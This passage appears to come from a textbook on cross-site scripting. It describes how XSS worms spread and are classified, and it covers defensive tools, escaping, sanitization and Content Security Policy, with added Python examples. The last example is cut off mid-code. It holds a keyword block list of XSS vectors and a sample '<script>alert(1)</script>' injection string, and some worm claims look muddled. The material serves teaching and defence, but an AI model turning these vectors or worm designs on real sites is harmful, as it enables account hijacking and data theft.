3. Replication: In this stage, the worm copies itself to the victim's profile page. It sends an amendment request to the server that looks like a legitimate request made by the legitimate user, and modifies the content of the victim's social-network account to include a copy of itself.
4. Reproduction: When other legitimate users visit the infected user's profile, the worm executes steps 2 and 3 again, which propagates it throughout the network. In this way, the XSS worm proliferates to infect a large number of users on any network.

FIGURE 5.2 Stages during the life cycle of the XSS worm.
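To make the four stages above, and the server-centred, one-to-many spread discussed for the Samy worm in Section 5.1.2, concrete, the following Python is an added example and not code from this chapter: a discrete-time model in which each user renders a few profiles per step, and rendering an infected profile runs stages 2 and 3 for that visitor, so that the visitor's own profile carries the worm from the next step on. The population size, visits per step, and random seed are arbitrary parameters of this model, not measurements of any real worm.

```python
"""Discrete-time model of a stored-XSS worm spreading through profile visits (added example)."""
import random


def simulate_xss_worm(users=200, visits_per_step=3, steps=60, seed=7):
    """Return the cumulative number of infected profiles after each step.

    Stage 1, vulnerability abuse: the attacker's own profile (user 0) carries the worm.
    Stage 2, privilege capture: a visitor who renders an infected profile runs the
        payload under their own session, so the worm can act as that user.
    Stage 3, replication: the payload writes a copy of itself into the visitor's profile.
    Stage 4, reproduction: from the next step on, that profile infects its own visitors.
    """
    rng = random.Random(seed)
    infected = [False] * users
    infected[0] = True
    history = [1]
    for _ in range(steps):
        newly_infected = []
        for visitor in range(users):
            if infected[visitor]:
                continue
            # Every profile read goes through the one server; visitors never contact
            # each other, which is why the spread does not congest the network.
            viewed = rng.sample(range(users), visits_per_step)
            if any(infected[profile] for profile in viewed):
                newly_infected.append(visitor)
        for visitor in newly_infected:
            infected[visitor] = True
        history.append(sum(infected))
    return history


def first_step_reaching(history, target):
    """Index of the first step at which at least `target` profiles are infected."""
    for step, count in enumerate(history):
        if count >= target:
            return step
    return None


if __name__ == "__main__":
    h = simulate_xss_worm()
    print("infected profiles per step:", h[:10], "...")
    print("all 200 profiles infected at step", first_step_reaching(h, 200))
```

The counts grow roughly by a factor of three per step while few profiles are infected, which is the exponential phase; once most profiles carry the worm, almost every remaining visitor is infected on their next visit, and the whole population is reached within a handful of steps. Lowering `visits_per_step` or shrinking `users` slows the curve but does not change its shape.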

5.3 CATEGORIES OF XSS WORM

In this section, we shed some light on the different types of XSS worms [27]. XSS worms may have different names and logic, but internally all worms share the same motive or the same propagation style. We have classified XSS worms into three types based on their style of infection and propagation: the Exponential XSS worm, the XSS Flash worm, and the Linear XSS worm. Now, let's dissect each type in turn.

5.3.1 Exponential XSS Worm

Suppose an attacker wants to perform multiple malicious activities, say account hijacking, gaining remote access to the victim's machine, replicating a copy of itself to proliferate, and performing other attacks like Cross-Site Request Forgery (CSRF), DDoS, and so on. One way is to write the exploit code for each individually, but that is a poor choice because the chance of being identified is high. What if there were a way to chain all these attacks by abusing a single vulnerability? There is, and it is the main idea behind the Exponential XSS worm.

The Exponential XSS worm can navigate through many domains and perform attacks on various sites by exploiting only a single XSS vulnerability. The number and nature of the attacked sites depend on the motive of the attacker. To achieve its objective, the attacker first identifies the sites of interest and the vulnerability present in them, then crafts the malicious worm logic and chains the target sites, either by redirection or by using IFrames; the latter is faster and more advanced. The target sites can then be exploited for sending spam messages, account hijacking, injecting malware to open backdoors, bank account forgery, session stealing, and so on. The effects on the victim can be severe, ranging from financial ruin to a ruined life through apparent involvement in child pornography and/or terrorist events. The range of malicious activities is restricted only by the attacker's imagination.

5.3.2 XSS Flash Worm

Worms such as Code Red I replicate themselves onto vulnerable machines by exploiting some kind of vulnerability, but their efficiency depends on how fast they spread and how many targets they infect. The attacker who develops a worm wants to infect as many users as possible, because a worm is more catastrophic the faster it spreads. The speed of infection is proportional to how quickly vulnerable target machines are identified. Vulnerable machines can be recognized through scanning, but linear scanning is not sufficient; hit-list scanning, which uses a pre-compiled list of vulnerable machines, is used to gain maximum benefit. This is the main idea behind the XSS Warhol worm, also known as the XSS Flash worm: the fastest propagating worm on the internet, infecting almost every vulnerable machine worldwide within 15 minutes of its release. It is a conceptual worm, as such an infection speed has not been achieved in reality. The most threatening real worm, the Samy worm, infected over 1 million users within 20 hours.

In the initial phase, the attacker collects a pre-compiled list of vulnerable machines and releases the Warhol worm. Whenever the worm infects a machine, it divides the list into two parts, keeping one half for itself and handing the other to the newly infected machine. This ensures that all machines in the list are scanned within a minute, and the worm replicates itself on all identified machines. However, this process slows down when few uninfected machines remain, so permutation scanning is used: all worm instances search the address space in the same pseudo-random permutation, and an already-infected machine behaves differently so that the time that would be spent re-infecting it is saved. This increases the propagation speed by reducing the re-infection effort. Finally, the attacker achieves a higher infection rate with complete scanning.

The infection accuracy of the XSS Flash worm is high because XSS worms are platform independent. If one browser is exploited with malicious code, the others are highly likely to be infected as well; after all, every browser offers the same functionality and displays a site with the same interface and functions.
Real-World XSS Worms and Handling Tools    ◾   117

5.3.3 Linear XSS Worm

What if an attacker wants to design an XSS worm that is released on one site and starts infecting other sites automatically? There are two approaches: the Linear XSS worm and the Hydra XSS worm. A Linear XSS worm uses the persistent XSS attack method to land on the parent site, performs its activities, propagates to the next target site, and repeats this until the scanning list is exhausted, whereas a Hydra XSS worm lands on the parent site and propagates to the other vulnerable sites simultaneously. The Linear worm requires little network bandwidth, since it propagates to only one site at a time, but it dies if any target in the scanning list is fixed, i.e. the vulnerability is resolved or the server is shut down. The Hydra worm, on the other hand, demands more network bandwidth because data from multiple sites are needed at once. So an attacker crafts a worm that mixes the logic of both.

5.4 HANDLING TOOLS

According to many security organizations, such as OWASP and WhiteHat Security, XSS and SQL injection are among the vulnerabilities that have been prevalent in web applications for the longest time. The XSS attack is the easier of the two and hence the more attractive one for an attacker. Researchers and industry security experts have developed open-source tools and scanners to detect, exploit, and report XSS vulnerabilities to the user. The main goal of this section is therefore to highlight some of the popular tools and techniques for defending against the XSS attack. Table 5.2 lists these tools with a brief description of each.

5.5 CHAPTER SUMMARY


Integration of breakthrough technologies into designing web
applications makes digital business boom and, thereby, the
number of active internet actors. Te XSS attack incidences are
118 ◾ Cross-Site Scripting Attacks

TABLE 5.2 Tools and Techniques to Defend XSS


S. R.
No. Tool Platform Explanation
1. OWASP Multiplatform It is the state-of-the-art framework
Xenotix XSS developed under OWASP projects
Exploit to detect and exploit the XSS
Framework attack. It does XSS detection by
[22] performing a scan within the
browser engines in which the
payload refects in the real world.
It incurs low false-positive rate. It
involves three fuzzers to minimize
the scanning time and outputs
better results.
2. Subgraph Vega Multiplatform It is the testing and scanning tool
Vulnerability (Linux, OS to detect web application
Scanner [28] X, and vulnerabilities. It includes
Windows) automated scanners for testing
and intercepting proxy to identify
vulnerabilities. It is written in
JavaScript and is easy to generate
attack vectors by using API.
3. OWASP Multiplatform It is an API to ensure that the user
Antisamy [20] can only provide data that
complies with HTML/CSS rules.
It ensures that the user cannot
supply malicious code in their
profle, comments, etc.
4. HTML Purifer Multiplatform It is an HTML flter library written
[17] in PHP. It removes malicious
codes by using an audited
whitelist. It accomplishes its task
with compliance to standards.
5. OWASP HTML Multiplatform It is an easy and fast HTML sanitizer
Sanitizer [21] developed in Java under OWASP
projects. It performs the sanitization
of malicious HTML codes. It
permits only authored HTML from
third-party applications to defend
against the XSS attack.
(Continued )
Real-World XSS Worms and Handling Tools    ◾   119

TABLE 5.2 (CONTINUED) Tools and Techniques to Defend XSS


S. R.
No. Tool Platform Explanation
6. htmLawed [16] Multiplatform It is written in PHP for fltering the
HTML text so that the HTML
tags and attributes which are
permitted by the site
administrator can be accessed and
processed by the browser. It is fast
and customizable and requires
low memory usage.
7. XSSer [31] Linux Cross-site scripter is an automatic
(Ubuntu) framework to detect, exploit, and
notify XSS vulnerabilities present
in the web applications.
8. WebScarab [30] Multiplatform Tis framework is written in Java
and is used for monitoring
applications using HTTP or
HTTPS protocol. Tis works as an
intercepting proxy to analyze
ingoing and outgoing requests
and responsive web pages. It can
detect multiple web application
vulnerabilities like SQL injection,
XSS, CSRF, etc.
9. W3af [29] Multiplatform It is built using Python and aims to
provide a better testing platform
for web application vulnerabilities.
It consists of both graphical user
interface and console user
interface. Tis framework is easier
to use and is easily extendable.
10. OWASP Zed Cross- ZAP is an open-source and
Attack Proxy platform multiplatform tool, developed by
(ZAP) [23] OWASP. Basically, it is a
penetration tester that scans the
web applications for multiple
vulnerabilities like XSS, SQL
injection, CSRF, and so on.
(Continued )
11. Netsparker [19] | Multiplatform | It is a multi-user, versatile, and scalable tool which offers proof-based scanning and helps in detecting web application vulnerabilities like XSS and SQL injection. It is a fully automated tool which is integrated during the development of software.
12. Probely [25] | Multiplatform | It provides an easy-to-use interface to scan web applications for recognizing different vulnerabilities. It also reports all the evidence and suggests solutions to fix them.
13. ImmuniWeb On-demand [18] | Cross-platform | It is a multilayer web application testing tool that combines the capabilities of AI and machine learning methods. It offers a fast, scalable, and economical method for identifying vulnerabilities. It covers the full range of OWASP Top 10 vulnerabilities.
14. Power Fuzzer [24] | Multiplatform | It is an automated, modular, and customizable fuzzer that builds on another fuzzer. It is capable of detecting XSS, SQL, and LDAP injection.
15. Burp Scanner [1] | Multiplatform | It is a fully automated penetration tester that is used by security experts to test an application. It can be integrated with other techniques to get effective results.
dominating the digital space, not because of the unavailability of efficient and robust techniques but because of the proliferation of social networking sites. In this case, the malicious XSS attack payload could traverse the entire network by harnessing social relationships and harvesting sensitive information, or by performing other malicious tasks. Consequently, this chapter has taken the reader in the direction of getting more information on the XSS worm. We have presented the basic concept of the XSS worm and have discussed the case study of the famous Samy worm. Moreover, the lifecycle of the XSS worm has been described in order to assist in understanding how a worm gets disseminated in a network. Afterwards, we categorized XSS worms and finally ended with a brief discussion on the different tools and techniques used to detect and mitigate several vulnerabilities, especially XSS.

REFERENCES
1. Burp scanner. [online] Available at: https://support.portswigger.net/customer/portal/articles/1783127-using-burp-scanner.
2. Cao, Y., Yegneswaran, V., Porras, P. A., & Chen, Y. (2012). PathCutter: Severing the self-propagation path of XSS JavaScript worms in social web networks. In NDSS.
3. Chaudhary, P., Gupta, B. B., & Gupta, S. (2019). A framework for preserving the privacy of online users against XSS worms on online social network. International Journal of Information Technology and Web Engineering, 14(1), 85–111.
4. Chaudhary, P., Gupta, S., & Gupta, B. B. (2016). Auditing defense against XSS worms in online social network-based web applications. In Handbook of Research on Modern Cryptographic Solutions for Computer and Cyber Security (pp. 216–245). IGI Global.
5. Faghani, M. R., & Nguyen, U. T. (2013). A study of XSS worm propagation and detection mechanisms in online social networks. IEEE Transactions on Information Forensics and Security, 8(11), 1815–1826.
6. Faghani, M. R., & Saidi, H. (2009). Social networks' XSS worms. In Proceedings of the 12th IEEE International Conference on Computational Science and Engineering (CSE'09). IEEE.
7. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles, Algorithm, Applications, and Perspectives. CRC Press.
8. Gupta, B. B., & Gupta, A. (2018). Assessment of honeypots: Issues, challenges and future directions. International Journal of Cloud Applications and Computing, 8(1), 21–54.
9. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the browser-side context-aware sanitization of suspicious HTML5 code for halting the DOM-based XSS vulnerabilities in cloud. International Journal of Cloud Applications and Computing, 7(1), 1–31.
10. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for Computer and Cyber Security: Principle, Algorithms, and Practices. CRC Press.
11. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sanitizer. In Handbook of Research on Securing Cloud-Based Databases with Biometric Applications (pp. 174–191). IGI Global.
12. Gupta, S., & Gupta, B. B. (2017). Detection, avoidance, and attack pattern mechanisms in modern web application vulnerabilities: Present and future challenges. International Journal of Cloud Applications and Computing, 7(3), 1–43.
13. Gupta, S., & Gupta, B. B. (2018). Robust injection point-based framework for modern applications against XSS vulnerabilities in online social networks. International Journal of Information and Computer Security, 10(2–3), 170–200.
14. Gupta, S., & Gupta, B. B. (2019). Evaluation and monitoring of XSS defensive solutions: A survey, open research issues and future directions. Journal of Ambient Intelligence and Humanized Computing, 10(11), 4377–4405.
15. Gupta, S., Gupta, B. B., & Chaudhary, P. (2018). A client-server JavaScript code rewriting-based framework to detect the XSS worms from online social network. Concurrency and Computation: Practice and Experience, 31(21), e4646.
16. htmLawed. [online] Available at: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/.
17. HTML Purifier. [online] Available at: http://htmlpurifier.org/.
18. ImmuniWeb On-demand. [online] Available at: https://www.immuniweb.com/products/ondemand/.
19. Netsparker. [online] Available at: https://www.netsparker.com/.
20. OWASP AntiSamy. [online] Available at: https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project.
21. OWASP HTML Sanitizer. [online] Available at: https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project.
22. OWASP Xenotix XSS Exploit Framework. [online] Available at: https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework.
23. OWASP Zed Attack Proxy (ZAP). [online] Available at: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project.
24. Kozlowski, M. Power Fuzzer: Web application vulnerabilities scanner. [online] Available at: https://www.powerfuzzer.com/.
25. Loureiro, N. Probely: Web vulnerability scanner. [online] Available at: https://blog.probely.com/web-security-testing-101-c08bc9117768.
26. Sahoo, S. R., & Gupta, B. B. (2019). Hybrid approach for detection of malicious profiles in Twitter. Computers and Electrical Engineering, 76, 65–81.
27. Seth, F., Jeremiah, G., Robert, H., Anton, R., & Petko, D. P. (2011). XSS Attacks: Cross Site Scripting Exploits and Defense. Elsevier.
28. Subgraph Vega vulnerability scanner. [online] Available at: https://subgraph.com/vega/.
29. W3af. [online] Available at: http://w3af.org/.
30. WebScarab. [online] Available at: https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project.
31. XSSer. [online] Available at: https://xsser.03c8.net/.
CHAPTER 6

XSS Preventive
Measures and
General Practices

This chapter puts emphasis on some of the general mechanisms that can be adopted to alleviate the XSS attack to a large extent. We focus on the XSS prevention rules that can be adopted on the developer's side to prevent the XSS attack. Nevertheless, it is obvious to say that these methods are not magic; they are ineffective without the user's awareness. Hence, additionally, we present a brief discussion on the general practices to keep our browser secure. In the next section, we discuss the XSS prevention rules.

6.1 INTRODUCTION
Until now, we have gone through enough information to understand the theory behind the XSS attack. From this, we can extract the fact that this vulnerability is not going away easily, because the majority of tools, scanners, or techniques lack the support that would help in permanently fixing this problem. There are many reasons behind this fact, but the main causes are, firstly, that the browser is not intelligent; it only performs what it is told. It has no capability to check whether a piece of code may have malign effects. Nevertheless, this does not seem to be the browser's task. Another reason for the XSS prevalence is the design of applications with security negligence, i.e. developing less secure or unsecure applications. Consequently, the user is left with two options: either to disable JavaScript in the browser's settings or to visit only known and secure sites. But it seems to be a difficult task for every internet user to have knowledge of the technicalities or to think too much while browsing.

Therefore, this chapter emphasizes some of the general mechanisms that can be adopted to alleviate the XSS attack to a large extent [3, 5, 6]. It focuses on discussing the XSS prevention rules that can be adopted at the developer's side to prevent the XSS attack. Nevertheless, it is obvious to say that these methods are not magic; they are ineffective without the user's awareness. Hence, additionally, the chapter presents a brief discussion on the general practices to keep our browser secure. In the next section, we discuss the XSS prevention rules.

6.2 XSS PREVENTION SCHEMES
The XSS vulnerability [9] takes advantage of improper input filtering, which makes malicious code injection easier for the attacker. This vulnerability occupies a high-ranking position among the OWASP Top 10 web application vulnerabilities and persists in security-related news. There is a constant increase in the proliferation of the XSS vulnerability, as highlighted in Figure 6.1, and it is clearly observed that only two vulnerabilities are ruling the world of security attacks on web applications: one is XSS and the other is injection vulnerabilities like SQL, LDAP, etc. [13]. As a result, multiple prevention techniques have been designed that can be adopted by developers to prevent the XSS attack. These techniques include filtering, escaping, and sanitization of untrusted data entered by the user. In the following subsections, we present a detailed discussion on each of these techniques.

FIGURE 6.1 Increase in the XSS vulnerability with years.

6.2.1 Filtering
The root cause of XSS (as discussed earlier) is inappropriate input filtering [10, 14]. The user can submit data to the web site in many ways, such as form submission and message posting, or through advanced methods like JSON, AJAX, XML, etc. As this is untrusted information entered by the user, it must not be processed in its raw form, as doing so may have serious security implications like XSS. Thereby, the first and foremost technique to prevent an XSS attack is filtering. It means all of the user's untrusted data must pass through a filter that filters out harmful keywords like the <script> tag, suspicious HTML event handlers like onActivate(), onClick(), JavaScript elements, style sheet tags, and so on. There are two types of filtering that can be applied: input filtering and output filtering. Input filtering is the same as discussed earlier, i.e. removing suspicious keywords from the entered data, whereas output filtering is applied on data that is reflected back in the response web page. It basically works for the persistent XSS attack. Nevertheless, every method has its limitations. The disadvantage of this technique is that it also removes legitimate data if it matches the restricted keywords. To overcome this, the filters need to be relaxed to include the necessary tags and elements, paving the way for the attacker.
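The two filtering passes and the false-positive problem just described can be seen in a few lines of code. The following is an added example for this section, not code from the book or from any tool it names; the RESTRICTED_KEYWORDS list, the function names and the sample posts are constructed for illustration.

```python
import re

# Constructed blocklist in the spirit of the filter described above: the
# <script> tag, inline event handlers (onclick=, onerror=, ...), the
# javascript: URL scheme and style sheet tags. Real filters are much longer.
RESTRICTED_KEYWORDS = [
    r"<\s*/?\s*script\b[^>]*>",  # <script ...> and </script>
    r"\bon[a-z]+\s*=",           # HTML event handler attributes
    r"\bjavascript\s*:",         # javascript: URLs
    r"<\s*/?\s*style\b[^>]*>",   # <style ...> and </style>
]
_RESTRICTED = re.compile("|".join(RESTRICTED_KEYWORDS), re.IGNORECASE)


def input_filter(submitted: str) -> str:
    """Input filtering: strip restricted keywords from data at submission
    time, before it is stored."""
    return _RESTRICTED.sub("", submitted)


def output_filter(stored: str) -> str:
    """Output filtering: the same removal applied when stored data is
    written back into a response page, which is what covers the persistent
    (stored) XSS case when the data was never input-filtered."""
    return _RESTRICTED.sub("", stored)


def filter_report(submitted: str) -> dict:
    """Run both filters and report whether anything was removed, so the
    collateral loss of legitimate text can be seen."""
    rendered = output_filter(input_filter(submitted))
    return {"rendered": rendered, "removed_something": rendered != submitted}


if __name__ == "__main__":
    # Constructed forum posts: one legitimate, one carrying the classic vector.
    for post in ("Use the <script> tag to embed JS", "<script>alert(1)</script>"):
        print(filter_report(post))
```

The first sample post is a legitimate sentence about HTML that loses its meaning, which is exactly the drawback the text describes: a keyword blocklist cannot tell a tutorial that mentions the <script> tag from an injection that uses it, and relaxing the list to let the tutorial through reopens the hole.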

6.2.2 Escaping
Escaping or encoding is another method to prevent the XSS attack [10, 15]. It works by restricting malicious script code from getting executed in the browser. It means the browser will treat the user input data as data and will not execute anything related to it. Therefore, if the attacker injects some illicit script code, then the browser will not run it, provided escaping is applied properly. Consequently, the user will remain unaffected. There are many types of encoding that can be applied to any web page. Let's discuss each one of them.

• HTML Entity Escaping: This type of escaping is applied when the untrusted data is inserted into an HTML body tag like div, p, td, etc. We have shown some examples of HTML entity escaping in Table 6.1.
• Attribute Value Escaping: It restricts the untrusted data from being directly inserted into suspicious attributes like "href," "src," "style," etc. It encodes all characters with ASCII value smaller than 256 as &#xHH;, where HH is the hexadecimal value of the character, leaving alphanumeric characters intact.
• JavaScript Escaping: JavaScript features like script blocks and event handlers are more prone to the XSS vulnerability. Therefore, data entered through these paths is encoded in the \uXXXX Unicode escape format, where each X is a hexadecimal digit.
• URL Escaping: The untrusted data is found only in the parameter value, so the encoding is applied on the parameter values. It uses the %HH escaping format.
• CSS Escaping: Style sheets can also be used for injection purposes. Therefore, this encoding uses the \HH and \HHHH escaping formats.

TABLE 6.1 HTML Entity Encoding

Character | Encoded Format
& | &amp; or &#38;
< | &lt; or &#60;
> | &gt; or &#62;
" | &quot; or &#34;
' | &#x27; or &#39;
/ | &#x2F; or &#47;
( | &#40;
) | &#41;
# | &#35;

Escaping is also of two types: input escaping and output escaping. Input escaping is effective only if it can correctly identify the context in which the untrusted data is inserted. On the other hand, output escaping is applied on the data written into the response web page. It also considers the context of the data and is helpful in preventing the stored XSS attack.
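The five escaping formats listed above, together with Table 6.1, can be implemented as one small encoder per context. The code below is an added example, not the book's code or any library's API; the function names and the render_profile() page fragment are constructed. It emits the hexadecimal references as &#xHH; (with the x prefix and trailing semicolon browsers require), pads the CSS escape to six digits so that no terminating space is needed, and uses urllib.parse.quote for the %HH form.

```python
from urllib.parse import quote

# Table 6.1 as a lookup, with the trailing semicolon every entity needs.
HTML_ENTITY_MAP = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
    "/": "&#47;", "(": "&#40;", ")": "&#41;", "#": "&#35;",
}


def _is_plain_alnum(ch: str) -> bool:
    """ASCII letters and digits are the only characters left untouched."""
    return ch.isascii() and ch.isalnum()


def html_entity_escape(data: str) -> str:
    """HTML entity escaping for untrusted data placed in an element body."""
    return "".join(HTML_ENTITY_MAP.get(ch, ch) for ch in data)


def attribute_value_escape(data: str) -> str:
    """Attribute value escaping: every non-alphanumeric character becomes a
    &#xHH; hexadecimal reference, so a quote can never close the attribute."""
    return "".join(ch if _is_plain_alnum(ch) else f"&#x{ord(ch):X};" for ch in data)


def javascript_escape(data: str) -> str:
    """JavaScript escaping: \\uXXXX for every non-alphanumeric character.
    Characters outside the BMP become two UTF-16 code units."""
    out = []
    for ch in data:
        if _is_plain_alnum(ch):
            out.append(ch)
        else:
            units = ch.encode("utf-16-be")
            for i in range(0, len(units), 2):
                out.append("\\u%04X" % int.from_bytes(units[i:i + 2], "big"))
    return "".join(out)


def url_escape(data: str) -> str:
    """URL (percent) escaping of a parameter value: %HH for every character
    that is not unreserved; quote() UTF-8 encodes non-ASCII first."""
    return quote(data, safe="")


def css_escape(data: str) -> str:
    """CSS escaping: a backslash followed by the code point in hexadecimal,
    padded to six digits so that no terminating space is required."""
    return "".join(ch if _is_plain_alnum(ch) else f"\\{ord(ch):06X}" for ch in data)


def render_profile(display_name: str) -> dict:
    """Place one untrusted value into four contexts of a constructed page
    fragment, each with the encoder that matches that context."""
    return {
        "body": f"<p>Welcome, {html_entity_escape(display_name)}</p>",
        "attribute": f'<input value="{attribute_value_escape(display_name)}">',
        "script": f'<script>var name = "{javascript_escape(display_name)}";</script>',
        "url": f'<a href="/search?q={url_escape(display_name)}">search</a>',
    }
```

render_profile() shows the point that matters in practice: the same display name needs a different encoder in each context, and the attribute and JavaScript encoders leave nothing but letters and digits unencoded, so a quote or angle bracket in the name can never close the attribute or the script string it sits in.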

6.2.3 Sanitization
It is another technique at hand to prevent the XSS attack [7, 10]. It is basically a process of cleaning the data, or sanitizing it, to make it secure from suspicious HTML tags or elements like <script>. It ensures that the entered data is in the same format that is expected to be received for that particular input field in the web site. It is required in the case where the site accepts input from the user with diverse content, including HTML tags or style fields. So sanitizing the data is a must to eliminate the harmful effects. There are several libraries or directives available to perform sanitization, like the OWASP HTML Sanitizer, Ruby on Rails SanitizeHelper, DOMPurify, PHP HTML Purifier, Python Bleach, and many more.

6.2.4 Use Content Security Policy (CSP)
The attacker can inject malicious scripts either using the <script> tag or using an HTML tag, or it might be possible that the browser loads the JavaScript from external sources. This opens up the path for the attacker to infect the user. Here, the attacker tricks the user's browser into loading a script from an unknown external source; the browser is not capable of distinguishing between a malicious script and a legitimate one. Hence, the browser simply executes the script without knowing its source and intention. It may infect the user with various code injection vulnerabilities like XSS. Hence, Mozilla proposed a security prototype named Content Security Policy (CSP) to mitigate various types of web application security vulnerabilities like XSS [1]. It allows a web site developer to specify the locations from which external resources on the web may be retrieved. Therefore, the browser is allowed to access only those resources that are whitelisted, ignoring all other resource domains. Consequently, the injected scripts won't get executed even if the attacker finds a way to inject them into the web site. However, it requires all the embedded JavaScript code to be shifted to a separate file. Consequently, it demands modifications in the web application, which is a tedious task for large web applications. It also needs modification in both the web site and the web browser.
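To make the whitelist idea concrete, here is an added example (not from the book or from Mozilla's documentation) that builds a CSP header and then models, in simplified form, the decision a browser makes for each script under that policy: only 'self', 'none', 'unsafe-inline' and exact origins are matched, with no wildcard, path, hash or nonce handling. The origins app.example.com and cdn.example.com are constructed.

```python
from urllib.parse import urlsplit


def build_csp(external_script_origins) -> str:
    """Build a whitelist-style Content-Security-Policy header value: scripts
    may come only from the page's own origin and the listed origins; plugins
    are disabled and <base> cannot be retargeted."""
    script_src = " ".join(["'self'", *external_script_origins])
    return (
        "default-src 'self'; "
        f"script-src {script_src}; "
        "object-src 'none'; "
        "base-uri 'self'"
    )


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _origin(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme.lower()}://{parts.netloc.lower()}"


def script_allowed(policy: dict, page_url: str, script_url=None) -> bool:
    """Model of the browser's decision for one script under the policy.
    script_url=None stands for an inline <script> block. Simplified: only
    'self', 'none', 'unsafe-inline' and exact origins are understood."""
    sources = policy.get("script-src", policy.get("default-src", []))
    if script_url is None:
        return "'unsafe-inline'" in sources
    if "'none'" in sources:
        return False
    target = _origin(script_url)
    for source in sources:
        if source == "'self'" and target == _origin(page_url):
            return True
        if not source.startswith("'") and _origin(source) == target:
            return True
    return False


if __name__ == "__main__":
    header = build_csp(["https://cdn.example.com"])
    print("Content-Security-Policy:", header)
    policy = parse_csp(header)
    page = "https://app.example.com/profile"
    print("own script  :", script_allowed(policy, page, "https://app.example.com/static/app.js"))
    print("cdn script  :", script_allowed(policy, page, "https://cdn.example.com/lib.js"))
    print("other script:", script_allowed(policy, page, "https://other.example.net/x.js"))
    print("inline      :", script_allowed(policy, page))
```

The inline case returns False, which is the cost the text points out: with this policy every embedded <script> block must move into a file served from an allowed origin. Later CSP revisions also let a page mark inline scripts with a per-response nonce or hash, which this model does not cover.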

6.2.5 Data Validation
The attacker keeps an eye on input fields that lack data validation, meaning that somehow he might be able to submit a malicious script through any field. For instance, suppose there is a field to enter an email id but validation is not applied; then the att acker may inject anything malicious that can be rendered by the browser.

Data validation [12] is a technique that ensures that the entered data comes within the syntactical constraints defined for that particular site, to prevent anything unwanted and malicious. There are various functions available in different languages; in PHP, for example, functions like is_numeric(), preg_match(), etc. are defined to validate the data, or you can use regular expressions to validate the data.

6.3 DIFFERENT PRACTICES FOR BROWSER SECURITY
In this section, we discuss some of the general practices and tips that can be implemented to keep the browser safe and secure from many internet threats [2, 4, 8, 11]. The attacker takes advantage of weak security features in the browser, which innocent users have to pay for. Once the attacker gains control of the browser, no user consent is asked before performing malicious activities that can affect the personal as well as professional life of the user. These vulnerabilities are not new and are not in the limelight; they have been prevalent on the internet for a long time. This reflects only one thing: that browser developers are less focused on providing a secure browser. Therefore, we present some tips for the user to be safe and secure from threats. The tips are as given below:

• Restricting Redirection: Sites that easily redirect to other sites, just for keeping logs of link click counts or to provide warnings against pop-up advertisements while downloading from the internet, are more likely to become infected with the XSS attack. Therefore, it is highly recommended to restrict redirection to other sites, as redirected sites may be the attacker's zone to steal sensitive information.
• Same Origin Policy (SOP): This simply permits a JavaScript program to obtain read or write access to data that has an identical origin to the script itself. The origin is identified by the URL address: host name, port number, and protocol version. However, port number and protocol version are static in nature. On the other hand, the SOP is also fragile enough to permit partial cross-domain access, as JavaScript can manipulate the host name. This policy merely has two alternatives: either "no access at all" or else "unrestricted access." Moreover, functions in two different scripts from dissimilar domains can be invoked on the same web page. Although it does not prevent any data from other domains being requested and loaded, this can transfer information to any other arbitrary domain for malicious activities like stealing cookies. Therefore, the XSS attack can infect a whole susceptible web application.
• Usage of Cookies by Third-Party Applications: Cookie information is private to the user, as it keeps track of the user's sessions on the internet. There are security settings in the browser where the user can control cookie usage by other sites. Some browsers like Firefox and IE keep this feature disabled by default. But what if the user is using some other browser? Therefore, the user has to keep track of sites that are using cookie information. It preserves the user's privacy and keeps away other security breaches.
• Extending the Browser's Security: It depends on the user to keep his security high while browsing. There are multiple explicit tools that can be integrated with the browser to extend its security. These tools include NoScript for Firefox, the Netcraft Anti-Phishing toolbar for Firefox and IE, and many more. These assist in protecting from phishing attacks, pop-up attacks, password stealing, and so on.
• Don't Click Lengthy URLs: The attacker entices the victim by sending URLs that may be obfuscated and too lengthy. Therefore, it is suggested to ignore these URLs and never click them until the authenticity of the source is known to the user. This helps in getting protection against reflected XSS, phishing attacks, redirection misuse, and many other threats.
• Use a Sandboxed Environment: Sometimes, users want to use some third-party components or need to visit unsecure sites; then it is suggested to use a sandboxed environment to keep the surfing activity separate from the other ongoing activities, so that if any malicious activity occurs there is no harm to the other programs running and they remain unaffected. It helps in protecting sensitive information from getting stolen by the attacker.
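The origin comparison behind the SOP bullet, and a redirect-target check for the first bullet, as an added example that is not code from the book; the origins in the tests and the allowed_origins list are constructed.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url: str):
    """Return the (scheme, host, port) triple that identifies an origin, or
    None when the URL carries no host (relative paths, javascript: URLs)."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.hostname:
        return None
    scheme = parts.scheme.lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, parts.hostname.lower(), port)


def same_origin(url_a: str, url_b: str) -> bool:
    """The SOP comparison: scheme, host and port must all match exactly."""
    a, b = origin_of(url_a), origin_of(url_b)
    return a is not None and a == b


def safe_redirect_target(requested: str, allowed_origins, fallback: str = "/") -> str:
    """Accept a redirect target only if it is a site-relative path or points
    at one of the allowed origins; anything else falls back to a fixed page."""
    parts = urlsplit(requested)
    if not parts.scheme and not parts.netloc:
        # A path on this site. "//host/x" has a netloc and never reaches here;
        # "/\\host" is rejected too, because some browsers read "\\" as "/".
        if requested.startswith("/") and requested[1:2] not in ("/", "\\"):
            return requested
        return fallback
    target = origin_of(requested)
    if target is not None and any(target == origin_of(o) for o in allowed_origins):
        return requested
    return fallback


if __name__ == "__main__":
    allowed = ["https://app.example.com", "https://docs.example.com"]
    for candidate in ("/account", "https://docs.example.com/guide",
                      "https://other.example.net/", "//other.example.net/"):
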